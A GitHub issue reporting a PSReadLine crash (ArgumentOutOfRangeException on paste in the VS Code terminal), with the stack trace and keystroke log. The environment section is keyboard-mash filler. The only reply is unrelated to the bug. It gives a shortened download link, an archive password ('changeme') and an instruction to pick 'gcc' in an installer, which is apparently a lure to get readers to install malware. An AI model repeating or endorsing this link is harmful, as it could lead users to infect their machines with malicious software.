### ISSUE TITLE
I'm being said by the error to immediately report this bug

### ISSUE THREAD

**Issue by HP8585** [PowerShell/PSReadLine#4143]
### Prerequisites

- [X] Write a descriptive title.
- [X] Make sure you are able to repro it on the [latest released version](https://www.powershellgallery.com/packages/PSReadLine)
- [X] Search the existing issues, especially the pinned issues.

### Exception report

```console
PS C:\Users\BEHCOMP\Desktop\nodeJS\chatApp2\client>
Oops, something went wrong.  Please report this bug with the details below.      
Report on GitHub: https://github.com/lzybkr/PSReadLine/issues/new
-----------------------------------------------------------------------
Last 123 Keys:
 m k d i r Space c l i e n t Enter
 c l s Enter
 m k d i r Space s e r v e r Enter
 c l s Enter
 c d Space c l i e n t Enter
 \ Backspace n p x Space n u x i @ ; Backspace l a t e s t Space i n i t Space . 
/ Enter
 c l s Enter
 n p m Space i n Backspace Space q u e r y - s t r i n g Space s o c k e t . i o 
= c Backspace Backspace - c l i e n t Enter
 c l s Enter
 Ctrl+v
Exception:
System.ArgumentOutOfRangeException: The value must be greater than or equal to zero and less than the console's buffer size in that dimension.
Parameter name: top
Actual value was -1.
   at System.Console.SetCursorPosition(Int32 left, Int32 top)
   at Microsoft.PowerShell.PSConsoleReadLine.ReallyRender(RenderData renderData, String defaultColor)
   at Microsoft.PowerShell.PSConsoleReadLine.ForceRender()
   at Microsoft.PowerShell.PSConsoleReadLine.Paste(Nullable`1 key, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey(ConsoleKeyInfo key, Dictionary`2 dispatchTable, Boolean ignoreIfNoAction, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.InputLoop()
   at Microsoft.PowerShell.PSConsoleReadLine.ReadLine(Runspace runspace, EngineIntrinsics engineIntrinsics)
-----------------------------------------------------------------------
```

### Screenshot

![Uploading Screenshot (273).png…]()

### Environment data

```console
I donno any of these things just wanted to report what you wanted me to                                                                             wwwwwwwwwwwwwwwwwwwwwwwwwwwwww   wwwwwwwwwwwwwwwwwwwwwwwww qwdqwdddddddddddddddddddddddddddddddddddddddddddd qweeeeeeeeeeeeeeeeeeeeeee qwedfdfdfdfdfdfdfdfdfdfdfdfdfdfdfwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
```

### Steps to reproduce

i was just working with the terminal of Visual Studio code and got this err

### Expected behavior

I just wanted to paste a piece of command that I faced this

### Actual behavior

PS C:\Users\BEHCOMP\Desktop\nodeJS\chatApp2\client>
Oops, something went wrong.  Please report this bug with the details below.      
Report on GitHub: https://github.com/lzybkr/PSReadLine/issues/new
-----------------------------------------------------------------------
Last 123 Keys:
 m k d i r Space c l i e n t Enter
 c l s Enter
 m k d i r Space s e r v e r Enter
 c l s Enter
 c d Space c l i e n t Enter
 \ Backspace n p x Space n u x i @ ; Backspace l a t e s t Space i n i t Space . 
/ Enter
 c l s Enter
 n p m Space i n Backspace Space q u e r y - s t r i n g Space s o c k e t . i o 
= c Backspace Backspace - c l i e n t Enter
 c l s Enter
 Ctrl+v
Exception:
System.ArgumentOutOfRangeException: The value must be greater than or equal to zero and less than the console's buffer size in that dimension.
Parameter name: top
Actual value was -1.
   at System.Console.SetCursorPosition(Int32 left, Int32 top)
   at Microsoft.PowerShell.PSConsoleReadLine.ReallyRender(RenderData renderData, String defaultColor)
   at Microsoft.PowerShell.PSConsoleReadLine.ForceRender()
   at Microsoft.PowerShell.PSConsoleReadLine.Paste(Nullable`1 key, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey(ConsoleKeyInfo key, Dictionary`2 dispatchTable, Boolean ignoreIfNoAction, Object arg)
   at Microsoft.PowerShell.PSConsoleReadLine.InputLoop()
   at Microsoft.PowerShell.PSConsoleReadLine.ReadLine(Runspace runspace, EngineIntrinsics engineIntrinsics)
-----------------------------------------------------------------------

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
